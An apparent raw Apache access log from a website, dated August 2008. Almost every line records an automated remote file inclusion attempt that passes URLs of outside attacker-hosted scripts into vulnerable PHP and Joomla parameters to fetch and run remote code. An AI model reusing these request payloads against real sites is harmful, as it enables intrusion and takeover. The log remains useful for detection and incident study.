118.129.166.13 - - [24/Aug/2008:10:33:37 -0700] "GET /logs/access_080809.log/errors.php?error=http://spiritualcultivation.com/modules/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:10:33:37 -0700] "GET /errors.php?error=http://spiritualcultivation.com/modules/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:10:33:38 -0700] "GET /logs/errors.php?error=http://spiritualcultivation.com/modules/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:10:33:58 -0700] "GET /logs/access_080315.log/errors.php?error=http://spiritualcultivation.com/modules/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.64.34.172 - - [24/Aug/2008:10:34:03 -0700] "GET /logs/access_080412.log/lostpasswd.php?env[include_prefix]=http://www.brguild.t5.com.br/forum//id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.34.172 - - [24/Aug/2008:10:34:03 -0700] "GET /lostpasswd.php?env[include_prefix]=http://www.brguild.t5.com.br/forum//id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.34.172 - - [24/Aug/2008:10:34:05 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.brguild.t5.com.br/forum//id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.176.226.164 - - [24/Aug/2008:10:34:19 -0700] "GET /logs/access_080723.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://viniciu-s.net/cmdAsc.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.34.172 - - [24/Aug/2008:10:34:25 -0700] "GET /logs/access_080806.log/lostpasswd.php?env[include_prefix]=http://www.brguild.t5.com.br/forum//id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.34.172 - - [24/Aug/2008:10:34:31 -0700] "GET /logs/access_080731.log/index.php?pag=http://www.brguild.t5.com.br/forum//id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.34.172 - - [24/Aug/2008:10:34:33 -0700] "GET /index.php?pag=http://www.brguild.t5.com.br/forum//id2.txt? HTTP/1.1" 200 9876 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.34.172 - - [24/Aug/2008:10:34:34 -0700] "GET /logs/index.php?pag=http://www.brguild.t5.com.br/forum//id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.55.108.192 - - [24/Aug/2008:10:34:35 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.108.192 - - [24/Aug/2008:10:34:37 -0700] "GET /logs/access_080218.log HTTP/1.1" 200 622413 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
81.9.63.18 - - [24/Aug/2008:10:34:49 -0700] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.hladogen.ru/project_files/memei.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
81.9.63.18 - - [24/Aug/2008:10:34:49 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.hladogen.ru/project_files/memei.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.52.244.232 - - [24/Aug/2008:10:34:55 -0700] "GET /logs/access_080621.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.10.154.65 - - [24/Aug/2008:10:34:55 -0700] "GET /logs/access_080621.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.97.183.24 - - [24/Aug/2008:10:35:02 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.battle-elite.de/be_inside/images/cicons/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.97.183.24 - - [24/Aug/2008:10:35:02 -0700] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.battle-elite.de/be_inside/images/cicons/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.237.152.109 - - [24/Aug/2008:10:35:09 -0700] "GET /logs/access_080601.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
69.94.70.15 - - [24/Aug/2008:10:35:14 -0700] "GET /errors.php?error=http://www.teamprobes.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.237.152.109 - - [24/Aug/2008:10:35:14 -0700] "GET /logs/access_080530.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
66.225.213.56 - - [24/Aug/2008:10:35:16 -0700] "GET /logs/administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.hepsiindirimli.com/var/skins_repository/default_green/tumbs.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.225.213.56 - - [24/Aug/2008:10:35:16 -0700] "GET /administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.hepsiindirimli.com/var/skins_repository/default_green/tumbs.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.85.201.66 - - [24/Aug/2008:10:35:26 -0700] "GET /logs/access_080812.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.battle-elite.de/be_inside/images/cicons/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
204.15.10.22 - - [24/Aug/2008:10:35:36 -0700] "GET /logs/access_080812.log/phphtml.php?htmlclass_path=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.185.237.191 - - [24/Aug/2008:10:35:48 -0700] "GET /logs/access_080412.log/?sourcedir=http://goodscanid.thewomanizer.net/verifica.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.185.237.191 - - [24/Aug/2008:10:35:48 -0700] "GET /logs/access_080412.log/?sourcedir=http://goodscanid.thewomanizer.net/verifica.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.185.237.191 - - [24/Aug/2008:10:35:49 -0700] "GET /?sourcedir=http://goodscanid.thewomanizer.net/verifica.txt? HTTP/1.1" 200 9882 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.185.237.191 - - [24/Aug/2008:10:35:49 -0700] "GET /?sourcedir=http://goodscanid.thewomanizer.net/verifica.txt? HTTP/1.1" 200 9882 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.185.237.191 - - [24/Aug/2008:10:35:55 -0700] "GET /logs/access_080313.log/?sourcedir=http://goodscanid.thewomanizer.net/verifica.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.185.237.191 - - [24/Aug/2008:10:35:55 -0700] "GET /logs/access_080313.log/?sourcedir=http://goodscanid.thewomanizer.net/verifica.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
74.202.49.162 - - [24/Aug/2008:10:35:57 -0700] "GET /logs/access_080223.log//oneadmin/config.php?path[docroot]=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/nid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.202.49.162 - - [24/Aug/2008:10:35:58 -0700] "GET //oneadmin/config.php?path[docroot]=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/nid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.202.49.162 - - [24/Aug/2008:10:35:59 -0700] "GET /logs//oneadmin/config.php?path[docroot]=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/nid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
198.66.222.121 - - [24/Aug/2008:10:36:04 -0700] "GET /logs/access_080412.log/?sourcedir=http://septimamaipu.cl/septima/mambots/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
198.66.222.121 - - [24/Aug/2008:10:36:04 -0700] "GET /logs/access_080412.log/?sourcedir=http://septimamaipu.cl/septima/mambots/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
198.66.222.121 - - [24/Aug/2008:10:36:04 -0700] "GET /?sourcedir=http://septimamaipu.cl/septima/mambots/idxx.txt??? HTTP/1.1" 200 9892 "-" "libwww-perl/5.65" "www.dmulk.com"
198.66.222.121 - - [24/Aug/2008:10:36:04 -0700] "GET /logs/?sourcedir=http://septimamaipu.cl/septima/mambots/idxx.txt??? HTTP/1.1" 200 61999 "-" "libwww-perl/5.65" "www.dmulk.com"
198.66.222.121 - - [24/Aug/2008:10:36:05 -0700] "GET /?sourcedir=http://septimamaipu.cl/septima/mambots/idxx.txt??? HTTP/1.1" 200 9892 "-" "libwww-perl/5.65" "www.dmulk.com"
198.66.222.121 - - [24/Aug/2008:10:36:05 -0700] "GET /logs/?sourcedir=http://septimamaipu.cl/septima/mambots/idxx.txt??? HTTP/1.1" 200 61999 "-" "libwww-perl/5.65" "www.dmulk.com"
213.248.62.98 - - [24/Aug/2008:10:36:09 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.64.34.172 - - [24/Aug/2008:10:36:10 -0700] "GET /logs/access_080229.log/index2.php?x=http://www.brguild.t5.com.br/forum//id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.248.62.98 - - [24/Aug/2008:10:36:10 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.64.34.172 - - [24/Aug/2008:10:36:10 -0700] "GET /index2.php?x=http://www.brguild.t5.com.br/forum//id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.34.172 - - [24/Aug/2008:10:36:10 -0700] "GET /logs/index2.php?x=http://www.brguild.t5.com.br/forum//id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
198.66.222.121 - - [24/Aug/2008:10:36:16 -0700] "GET /logs/access_080313.log/?sourcedir=http://septimamaipu.cl/septima/mambots/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
198.66.222.121 - - [24/Aug/2008:10:36:17 -0700] "GET /logs/access_080313.log/?sourcedir=http://septimamaipu.cl/septima/mambots/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
204.15.10.22 - - [24/Aug/2008:10:36:18 -0700] "GET /logs/access_080807.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.53.240.146 - - [24/Aug/2008:10:36:21 -0700] "GET /logs/access_080728.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [24/Aug/2008:10:36:21 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.12.48.41 - - [24/Aug/2008:10:36:23 -0700] "GET /logs/access_080224.log//header.php?base_folder=http://www.battle-elite.de/be_inside/images/cicons/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
195.12.48.41 - - [24/Aug/2008:10:36:24 -0700] "GET //header.php?base_folder=http://www.battle-elite.de/be_inside/images/cicons/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
195.12.48.41 - - [24/Aug/2008:10:36:24 -0700] "GET /logs//header.php?base_folder=http://www.battle-elite.de/be_inside/images/cicons/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.202.49.162 - - [24/Aug/2008:10:36:24 -0700] "GET /logs/access_080731.log//oneadmin/config.php?path[docroot]=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/nid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.48.41 - - [24/Aug/2008:10:36:26 -0700] "GET /logs/access_080107.log//header.php?base_folder=http://www.battle-elite.de/be_inside/images/cicons/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.53.240.146 - - [24/Aug/2008:10:36:36 -0700] "GET /logs/access_080117.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.64.34.172 - - [24/Aug/2008:10:36:41 -0700] "GET /logs/access_080207.log/index2.php?x=http://www.brguild.t5.com.br/forum//id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.111.11.7 - - [24/Aug/2008:10:36:41 -0700] "GET /logs/access_080324.log/page.php?doc=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.111.11.7 - - [24/Aug/2008:10:36:43 -0700] "GET /page.php?doc=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.111.11.7 - - [24/Aug/2008:10:36:45 -0700] "GET /logs/page.php?doc=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.111.11.7 - - [24/Aug/2008:10:36:47 -0700] "GET /logs/access_080515.log/page.php?doc=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.235.247.169 - - [24/Aug/2008:10:36:47 -0700] "GET /logs/access_080329.log//components-com_facileforms-facileforms-frame-php-html-php-html-components-com_phpshop=http://www.21stcenturywoman.com/pics/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.235.247.169 - - [24/Aug/2008:10:36:48 -0700] "GET /logs/access_080218.log//components-com_facileforms-facileforms-frame-php-html-php-html-components-com_phpshop=http://www.21stcenturywoman.com/pics/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.26.209.159 - - [24/Aug/2008:10:36:57 -0700] "GET /logs/access_080114.log//myspeach/jscript.php?my_ms[root]=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.26.209.159 - - [24/Aug/2008:10:36:58 -0700] "GET //myspeach/jscript.php?my_ms[root]=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.26.209.159 - - [24/Aug/2008:10:36:58 -0700] "GET /logs//myspeach/jscript.php?my_ms[root]=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.26.209.159 - - [24/Aug/2008:10:36:58 -0700] "GET /logs/access_080323.log//myspeach/jscript.php?my_ms[root]=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.200.212.3 - - [24/Aug/2008:10:37:08 -0700] "GET /logs/access_080401.log/index.php?option=com_content&task=view&id=http://www.tiibetinspanielit.fi/forum/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.200.212.3 - - [24/Aug/2008:10:37:09 -0700] "GET /index.php?option=com_content&task=view&id=http://www.tiibetinspanielit.fi/forum/ids.txt?? HTTP/1.1" 200 9917 "-" "libwww-perl/5.803" "www.dmulk.com"
91.200.212.3 - - [24/Aug/2008:10:37:11 -0700] "GET /logs/index.php?option=com_content&task=view&id=http://www.tiibetinspanielit.fi/forum/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.55.159.47 - - [24/Aug/2008:10:37:29 -0700] "GET /?view=page&pagename=http://elsalsete.com/galeria/imagenes/gnThumbNail/id.txt? HTTP/1.1" 200 8018 "-" "libwww-perl/5.803" "www.dmulk.com"
82.194.76.177 - - [24/Aug/2008:10:37:31 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://aocbots.com/cms/test.txt?? HTTP/1.1" 200 50 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
82.194.76.177 - - [24/Aug/2008:10:37:31 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://aocbots.com/cms/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
67.212.173.42 - - [24/Aug/2008:10:37:44 -0700] "GET /logs/access_080114.log//myspeach/jscript.php?my_ms[root]=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.212.173.42 - - [24/Aug/2008:10:37:44 -0700] "GET //myspeach/jscript.php?my_ms[root]=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.212.173.42 - - [24/Aug/2008:10:37:45 -0700] "GET /logs//myspeach/jscript.php?my_ms[root]=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.212.173.42 - - [24/Aug/2008:10:37:45 -0700] "GET /logs/access_080323.log//myspeach/jscript.php?my_ms[root]=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:10:38:05 -0700] "GET /logs/access_080809.log/errors.php?error=http://spiritualcultivation.com/modules/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:10:38:05 -0700] "GET /errors.php?error=http://spiritualcultivation.com/modules/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:10:38:05 -0700] "GET /logs/errors.php?error=http://spiritualcultivation.com/modules/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:10:38:07 -0700] "GET /logs/access_080315.log/errors.php?error=http://spiritualcultivation.com/modules/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
66.225.213.56 - - [24/Aug/2008:10:38:11 -0700] "GET /logs/access_080329.log//components-com_facileforms-facileforms-frame-php-html-php-html-components-com_phpshop=http://www.hepsiindirimli.com/var/skins_repository/default_green/tumbs.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.225.213.56 - - [24/Aug/2008:10:38:12 -0700] "GET /logs/access_080218.log//components-com_facileforms-facileforms-frame-php-html-php-html-components-com_phpshop=http://www.hepsiindirimli.com/var/skins_repository/default_green/tumbs.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.111.176.88 - - [24/Aug/2008:10:38:21 -0700] "GET /logs/access_080811.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://viniciu-s.net/cmdAsc.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.88 - - [24/Aug/2008:10:38:21 -0700] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://viniciu-s.net/cmdAsc.txt?????? HTTP/1.1" 200 10007 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.88 - - [24/Aug/2008:10:38:22 -0700] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://viniciu-s.net/cmdAsc.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.149.226.176 - - [24/Aug/2008:10:38:26 -0700] "GET /logs/access_080501.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://125.250.78.194/rgboard/manual/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.120.234.168 - - [24/Aug/2008:10:38:34 -0700] "GET /logs/access_080211.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
216.120.234.168 - - [24/Aug/2008:10:38:34 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
216.120.234.168 - - [24/Aug/2008:10:38:34 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
70.85.201.66 - - [24/Aug/2008:10:38:40 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.battle-elite.de/be_inside/images/cicons/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.201.66 - - [24/Aug/2008:10:38:40 -0700] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.battle-elite.de/be_inside/images/cicons/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.64.34.172 - - [24/Aug/2008:10:38:49 -0700] "GET /logs/access_080131.log/index.php?pag=http://www.brguild.t5.com.br/forum//id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.97.183.24 - - [24/Aug/2008:10:39:01 -0700] "GET /logs/access_080812.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.battle-elite.de/be_inside/images/cicons/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.97.183.24 - - [24/Aug/2008:10:39:01 -0700] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.battle-elite.de/be_inside/images/cicons/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.97.183.24 - - [24/Aug/2008:10:39:01 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.battle-elite.de/be_inside/images/cicons/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
198.66.222.121 - - [24/Aug/2008:10:39:02 -0700] "GET /logs/?sourcedir=http://septimamaipu.cl/septima/mambots/idxx.txt??? HTTP/1.1" 200 61999 "-" "libwww-perl/5.65" "www.dmulk.com"
208.97.183.24 - - [24/Aug/2008:10:39:02 -0700] "GET /logs/access_080625.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.battle-elite.de/be_inside/images/cicons/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
198.66.222.121 - - [24/Aug/2008:10:39:03 -0700] "GET /logs/?sourcedir=http://septimamaipu.cl/septima/mambots/idxx.txt??? HTTP/1.1" 200 61999 "-" "libwww-perl/5.65" "www.dmulk.com"
198.66.222.121 - - [24/Aug/2008:10:39:03 -0700] "GET /?sourcedir=http://septimamaipu.cl/septima/mambots/idxx.txt??? HTTP/1.1" 200 9892 "-" "libwww-perl/5.65" "www.dmulk.com"
198.66.222.121 - - [24/Aug/2008:10:39:04 -0700] "GET /?sourcedir=http://septimamaipu.cl/septima/mambots/idxx.txt??? HTTP/1.1" 200 9892 "-" "libwww-perl/5.65" "www.dmulk.com"
74.202.49.162 - - [24/Aug/2008:10:39:10 -0700] "GET /logs/access_080114.log//myspeach/jscript.php?my_ms[root]=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/nid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.202.49.162 - - [24/Aug/2008:10:39:13 -0700] "GET //myspeach/jscript.php?my_ms[root]=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/nid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.202.49.162 - - [24/Aug/2008:10:39:14 -0700] "GET /logs//myspeach/jscript.php?my_ms[root]=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/nid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
